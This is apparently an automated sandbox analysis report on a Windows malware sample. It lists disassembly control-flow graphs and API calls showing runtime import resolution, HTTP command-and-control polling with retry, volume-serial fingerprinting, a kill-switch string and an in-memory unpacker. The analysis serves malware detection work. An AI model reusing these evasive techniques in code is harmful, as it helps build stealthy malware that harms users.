                              control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00706460), ref: 00419C2D
                              • GetProcAddress.KERNEL32(75900000,007064A0), ref: 00419C45
                              • GetProcAddress.KERNEL32(75900000,007100A8), ref: 00419C5E
                              • GetProcAddress.KERNEL32(75900000,0070FE98), ref: 00419C76
                              • GetProcAddress.KERNEL32(75900000,00710000), ref: 00419C8E
                              • GetProcAddress.KERNEL32(75900000,0070FFB8), ref: 00419CA7
                              • GetProcAddress.KERNEL32(75900000,0070A858), ref: 00419CBF
                              • GetProcAddress.KERNEL32(75900000,0070FF40), ref: 00419CD7
                              • GetProcAddress.KERNEL32(75900000,00710120), ref: 00419CF0
                              • GetProcAddress.KERNEL32(75900000,00710138), ref: 00419D08
                              • GetProcAddress.KERNEL32(75900000,0070FF88), ref: 00419D20
                              • GetProcAddress.KERNEL32(75900000,007064E0), ref: 00419D39
                              • GetProcAddress.KERNEL32(75900000,007062A0), ref: 00419D51
                              • GetProcAddress.KERNEL32(75900000,007062C0), ref: 00419D69
                              • GetProcAddress.KERNEL32(75900000,00706100), ref: 00419D82
                              • GetProcAddress.KERNEL32(75900000,00710048), ref: 00419D9A
                              • GetProcAddress.KERNEL32(75900000,0070FEB0), ref: 00419DB2
                              • GetProcAddress.KERNEL32(75900000,0070A718), ref: 00419DCB
                              • GetProcAddress.KERNEL32(75900000,007061A0), ref: 00419DE3
                              • GetProcAddress.KERNEL32(75900000,00710060), ref: 00419DFB
                              • GetProcAddress.KERNEL32(75900000,0070FEC8), ref: 00419E14
                              • GetProcAddress.KERNEL32(75900000,00710018), ref: 00419E2C
                              • GetProcAddress.KERNEL32(75900000,0070FEF8), ref: 00419E44
                              • GetProcAddress.KERNEL32(75900000,00706640), ref: 00419E5D
                              • GetProcAddress.KERNEL32(75900000,0070FFD0), ref: 00419E75
                              • GetProcAddress.KERNEL32(75900000,00710150), ref: 00419E8D
                              • GetProcAddress.KERNEL32(75900000,0070FE68), ref: 00419EA6
                              • GetProcAddress.KERNEL32(75900000,0070FFA0), ref: 00419EBE
                              • GetProcAddress.KERNEL32(75900000,00710030), ref: 00419ED6
                              • GetProcAddress.KERNEL32(75900000,0070FEE0), ref: 00419EEF
                              • GetProcAddress.KERNEL32(75900000,00710078), ref: 00419F07
                              • GetProcAddress.KERNEL32(75900000,00710090), ref: 00419F1F
                              • GetProcAddress.KERNEL32(75900000,007100F0), ref: 00419F38
                              • GetProcAddress.KERNEL32(75900000,00709C80), ref: 00419F50
                              • GetProcAddress.KERNEL32(75900000,0070FF10), ref: 00419F68
                              • GetProcAddress.KERNEL32(75900000,0070FF28), ref: 00419F81
                              • GetProcAddress.KERNEL32(75900000,00706620), ref: 00419F99
                              • GetProcAddress.KERNEL32(75900000,007101F8), ref: 00419FB1
                              • GetProcAddress.KERNEL32(75900000,00706660), ref: 00419FCA
                              • GetProcAddress.KERNEL32(75900000,00710198), ref: 00419FE2
                              • GetProcAddress.KERNEL32(75900000,007101B0), ref: 00419FFA
                              • GetProcAddress.KERNEL32(75900000,00706740), ref: 0041A013
                              • GetProcAddress.KERNEL32(75900000,00706560), ref: 0041A02B
                              • LoadLibraryA.KERNEL32(007101C8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                              • LoadLibraryA.KERNEL32(007101E0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                              • LoadLibraryA.KERNEL32(00710210,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                              • LoadLibraryA.KERNEL32(00710168,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                              • LoadLibraryA.KERNEL32(00710228,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                              • LoadLibraryA.KERNEL32(00710180,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                              • LoadLibraryA.KERNEL32(0073F9F8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                              • LoadLibraryA.KERNEL32(0073F998,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                              • GetProcAddress.KERNEL32(75FD0000,007066C0), ref: 0041A0DA
                              • GetProcAddress.KERNEL32(75FD0000,0073F950), ref: 0041A0F2
                              • GetProcAddress.KERNEL32(75FD0000,0070F620), ref: 0041A10A
                              • GetProcAddress.KERNEL32(75FD0000,0073FA28), ref: 0041A123
                              • GetProcAddress.KERNEL32(75FD0000,00706700), ref: 0041A13B
                              • GetProcAddress.KERNEL32(734B0000,0070A9C0), ref: 0041A160
                              • GetProcAddress.KERNEL32(734B0000,00706540), ref: 0041A179
                              • GetProcAddress.KERNEL32(734B0000,0070A8F8), ref: 0041A191
                              • GetProcAddress.KERNEL32(734B0000,0073F9B0), ref: 0041A1A9
                              • GetProcAddress.KERNEL32(734B0000,0073FA70), ref: 0041A1C2
                              • GetProcAddress.KERNEL32(734B0000,00706580), ref: 0041A1DA
                              • GetProcAddress.KERNEL32(734B0000,00706500), ref: 0041A1F2
                              • GetProcAddress.KERNEL32(734B0000,0073F860), ref: 0041A20B
                              • GetProcAddress.KERNEL32(763B0000,007065E0), ref: 0041A22C
                              • GetProcAddress.KERNEL32(763B0000,007065A0), ref: 0041A244
                              • GetProcAddress.KERNEL32(763B0000,0073FA40), ref: 0041A25D
                              • GetProcAddress.KERNEL32(763B0000,0073F8F0), ref: 0041A275
                              • GetProcAddress.KERNEL32(763B0000,00706760), ref: 0041A28D
                              • GetProcAddress.KERNEL32(750F0000,0070A6C8), ref: 0041A2B3
                              • GetProcAddress.KERNEL32(750F0000,0070A8D0), ref: 0041A2CB
                              • GetProcAddress.KERNEL32(750F0000,0073FA10), ref: 0041A2E3
                              • GetProcAddress.KERNEL32(750F0000,00706780), ref: 0041A2FC
                              • GetProcAddress.KERNEL32(750F0000,007065C0), ref: 0041A314
                              • GetProcAddress.KERNEL32(750F0000,0070A628), ref: 0041A32C
                              • GetProcAddress.KERNEL32(75A50000,0073F980), ref: 0041A352
                              • GetProcAddress.KERNEL32(75A50000,00706600), ref: 0041A36A
                              • GetProcAddress.KERNEL32(75A50000,0070F690), ref: 0041A382
                              • GetProcAddress.KERNEL32(75A50000,0073F878), ref: 0041A39B
                              • GetProcAddress.KERNEL32(75A50000,0073F968), ref: 0041A3B3
                              • GetProcAddress.KERNEL32(75A50000,007066E0), ref: 0041A3CB
                              • GetProcAddress.KERNEL32(75A50000,00706680), ref: 0041A3E4
                              • GetProcAddress.KERNEL32(75A50000,0073F908), ref: 0041A3FC
                              • GetProcAddress.KERNEL32(75A50000,0073F938), ref: 0041A414
                              • GetProcAddress.KERNEL32(75070000,00706520), ref: 0041A436
                              • GetProcAddress.KERNEL32(75070000,0073F9C8), ref: 0041A44E
                              • GetProcAddress.KERNEL32(75070000,0073FA88), ref: 0041A466
                              • GetProcAddress.KERNEL32(75070000,0073F8A8), ref: 0041A47F
                              • GetProcAddress.KERNEL32(75070000,0073F9E0), ref: 0041A497
                              • GetProcAddress.KERNEL32(74E50000,007066A0), ref: 0041A4B8
                              • GetProcAddress.KERNEL32(74E50000,00706720), ref: 0041A4D1
                              • GetProcAddress.KERNEL32(75320000,007067E0), ref: 0041A4F2
                              • GetProcAddress.KERNEL32(75320000,0073F920), ref: 0041A50A
                              • GetProcAddress.KERNEL32(6F060000,007067A0), ref: 0041A530
                              • GetProcAddress.KERNEL32(6F060000,007067C0), ref: 0041A548
                              • GetProcAddress.KERNEL32(6F060000,00706800), ref: 0041A560
                              • GetProcAddress.KERNEL32(6F060000,0073F8C0), ref: 0041A579
                              • GetProcAddress.KERNEL32(6F060000,00706820), ref: 0041A591
                              • GetProcAddress.KERNEL32(6F060000,00706840), ref: 0041A5A9
                              • GetProcAddress.KERNEL32(6F060000,00706860), ref: 0041A5C2
                              • GetProcAddress.KERNEL32(6F060000,00706880), ref: 0041A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                              • GetProcAddress.KERNEL32(74E00000,0073FA58), ref: 0041A629
                              • GetProcAddress.KERNEL32(74E00000,0070F5C0), ref: 0041A641
                              • GetProcAddress.KERNEL32(74E00000,0073F7A0), ref: 0041A659
                              • GetProcAddress.KERNEL32(74E00000,0073F7B8), ref: 0041A672
                              • GetProcAddress.KERNEL32(74DF0000,007068A0), ref: 0041A693
                              • GetProcAddress.KERNEL32(6F9C0000,0073F7D0), ref: 0041A6B4
                              • GetProcAddress.KERNEL32(6F9C0000,006FAE80), ref: 0041A6CD
                              • GetProcAddress.KERNEL32(6F9C0000,0073F7E8), ref: 0041A6E5
                              • GetProcAddress.KERNEL32(6F9C0000,0073F890), ref: 0041A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: ep$ fp$ gp$ hp$@ep$@fp$@gp$@hp$HttpQueryInfoA$InternetSetOptionA$`dp$`ep$`fp$`gp$`hp$dp$ep$fp$gp
                              • API String ID: 2238633743-2838955627
                              • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                              • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                              • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                              • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1001 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1017 41557c-415583 1001->1017 1018 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1017->1018 1019 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1017->1019 1035 4155bb-4155d2 call 41a8a0 call 41a800 1018->1035 1045 415693-4156a9 call 41aad0 StrCmpCA 1019->1045 1049 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1019->1049 1035->1045 1050 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1045->1050 1051 4156af-4156b6 1045->1051 1049->1045 1180 415ac3-415ac6 1050->1180 1053 4157da-41585f call 41aad0 StrCmpCA 1051->1053 1054 4156bc-4156c3 1051->1054 1073 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1053->1073 1074 415865-41586c 1053->1074 1058 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1054->1058 1059 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1054->1059 1058->1053 1059->1053 1157 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1059->1157 1073->1180 1080 415872-415879 1074->1080 1081 41598f-415a14 call 41aad0 StrCmpCA 1074->1081 1088 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1080->1088 1089 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1080->1089 1109 415a16-415a21 Sleep 1081->1109 1110 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1081->1110 1088->1081 1186 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1088->1186 1089->1081 1109->1017 1110->1180 1157->1053 1186->1081
                              APIs
                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0070F550,?,0042110C,?,00000000), ref: 0041A82B
                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleepstrtok
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$cp
                              • API String ID: 3630751533-2074963571
                              • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                              • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                              • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                              • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1212 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1219 406314-406318 1212->1219 1220 40630d 1212->1220 1221 406509-406525 call 41a7a0 call 41a800 * 2 1219->1221 1222 40631e-406342 InternetConnectA 1219->1222 1220->1219 1240 406528-40652d 1221->1240 1223 406348-40634c 1222->1223 1224 4064ff-406503 InternetCloseHandle 1222->1224 1226 40635a 1223->1226 1227 40634e-406358 1223->1227 1224->1221 1229 406364-406392 HttpOpenRequestA 1226->1229 1227->1229 1231 4064f5-4064f9 InternetCloseHandle 1229->1231 1232 406398-40639c 1229->1232 1231->1224 1234 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1232->1234 1235 40639e-4063bf InternetSetOptionA 1232->1235 1238 406407-406427 call 41a740 call 41a800 * 2 1234->1238 1239 40642c-40644b call 418940 1234->1239 1235->1234 1238->1240 1245 4064c9-4064e9 call 41a740 call 41a800 * 2 1239->1245 1246 40644d-406454 1239->1246 1245->1240 1249 406456-406480 InternetReadFile 1246->1249 1250 4064c7-4064ef InternetCloseHandle 1246->1250 1254 406482-406489 1249->1254 1255 40648b 1249->1255 1250->1231 1254->1255 1259 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1254->1259 1255->1250 1259->1249
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                              • StrCmpCA.SHLWAPI(?,00740FA8), ref: 00406303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00740690,00000000,00000000,00400100,00000000), ref: 00406385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                              • InternetCloseHandle.WININET(00000000), ref: 004064EF
                              • InternetCloseHandle.WININET(00000000), ref: 004064F9
                              • InternetCloseHandle.WININET(00000000), ref: 00406503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3074848878-2509457195
                              • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                              • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                              • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                              • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1269 4117a0-4117cd call 41aad0 StrCmpCA 1272 4117d7-4117f1 call 41aad0 strtok_s 1269->1272 1273 4117cf-4117d1 ExitProcess 1269->1273 1276 4117f4-4117f8 1272->1276 1277 4119c2-4119cd call 41a800 1276->1277 1278 4117fe-411811 1276->1278 1280 411817-41181a 1278->1280 1281 41199e-4119bd strtok_s 1278->1281 1283 411821-411830 call 41a820 1280->1283 1284 411849-411858 call 41a820 1280->1284 1285 4118ad-4118be StrCmpCA 1280->1285 1286 4118cf-4118e0 StrCmpCA 1280->1286 1287 41198f-411999 call 41a820 1280->1287 1288 4118f1-411902 StrCmpCA 1280->1288 1289 411951-411962 StrCmpCA 1280->1289 1290 411970-411981 StrCmpCA 1280->1290 1291 411913-411924 StrCmpCA 1280->1291 1292 411932-411943 StrCmpCA 1280->1292 1293 411835-411844 call 41a820 1280->1293 1294 41185d-41186e StrCmpCA 1280->1294 1295 41187f-411890 StrCmpCA 1280->1295 1281->1276 1283->1281 1284->1281 1305 4118c0-4118c3 1285->1305 1306 4118ca 1285->1306 1307 4118e2-4118e5 1286->1307 1308 4118ec 1286->1308 1287->1281 1309 411904-411907 1288->1309 1310 41190e 1288->1310 1315 411964-411967 1289->1315 1316 41196e 1289->1316 1296 411983-411986 1290->1296 1297 41198d 1290->1297 1311 411930 1291->1311 1312 411926-411929 1291->1312 1313 411945-411948 1292->1313 1314 41194f 1292->1314 1293->1281 1301 411870-411873 1294->1301 1302 41187a 1294->1302 1303 411892-41189c 1295->1303 1304 41189e-4118a1 1295->1304 1296->1297 1297->1281 1301->1302 1302->1281 1320 4118a8 1303->1320 1304->1320 1305->1306 1306->1281 1307->1308 1308->1281 1309->1310 1310->1281 1311->1281 1312->1311 1313->1314 1314->1281 1315->1316 1316->1281 1320->1281
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcessstrtok_s
                              • String ID: block
                              • API String ID: 3407564107-2199623458
                              • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                              • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                              • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                              • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                              • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                              • wsprintfA.USER32 ref: 00417640
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 3790021787-3809124531
                              • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                              • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                              • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                              • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1344 22e003c-22e0047 1345 22e004c-22e0263 call 22e0a3f call 22e0e0f call 22e0d90 VirtualAlloc 1344->1345 1346 22e0049 1344->1346 1361 22e028b-22e0292 1345->1361 1362 22e0265-22e0289 call 22e0a69 1345->1362 1346->1345 1364 22e02a1-22e02b0 1361->1364 1366 22e02ce-22e03c2 VirtualProtect call 22e0cce call 22e0ce7 1362->1366 1364->1366 1367 22e02b2-22e02cc 1364->1367 1373 22e03d1-22e03e0 1366->1373 1367->1364 1374 22e0439-22e04b8 VirtualFree 1373->1374 1375 22e03e2-22e0437 call 22e0ce7 1373->1375 1377 22e04be-22e04cd 1374->1377 1378 22e05f4-22e05fe 1374->1378 1375->1373 1380 22e04d3-22e04dd 1377->1380 1381 22e077f-22e0789 1378->1381 1382 22e0604-22e060d 1378->1382 1380->1378 1384 22e04e3-22e0505 1380->1384 1385 22e078b-22e07a3 1381->1385 1386 22e07a6-22e07b0 1381->1386 1382->1381 1387 22e0613-22e0637 1382->1387 1395 22e0517-22e0520 1384->1395 1396 22e0507-22e0515 1384->1396 1385->1386 1388 22e086e-22e08be LoadLibraryA 1386->1388 1389 22e07b6-22e07cb 1386->1389 1390 22e063e-22e0648 1387->1390 1394 22e08c7-22e08f9 1388->1394 1392 22e07d2-22e07d5 1389->1392 1390->1381 1393 22e064e-22e065a 1390->1393 1397 22e07d7-22e07e0 1392->1397 1398 22e0824-22e0833 1392->1398 1393->1381 1399 22e0660-22e066a 1393->1399 1401 22e08fb-22e0901 1394->1401 1402 22e0902-22e091d 1394->1402 1403 22e0526-22e0547 1395->1403 1396->1403 1404 22e07e4-22e0822 1397->1404 1405 22e07e2 1397->1405 1400 22e0839-22e083c 1398->1400 1406 22e067a-22e0689 1399->1406 1400->1388 1407 22e083e-22e0847 1400->1407 1401->1402 1410 22e054d-22e0550 1403->1410 1404->1392 1405->1398 1408 22e068f-22e06b2 1406->1408 1409 22e0750-22e077a 1406->1409 1411 22e084b-22e086c 1407->1411 1412 22e0849 1407->1412 1413 22e06ef-22e06fc 1408->1413 1414 22e06b4-22e06ed 1408->1414 1409->1390 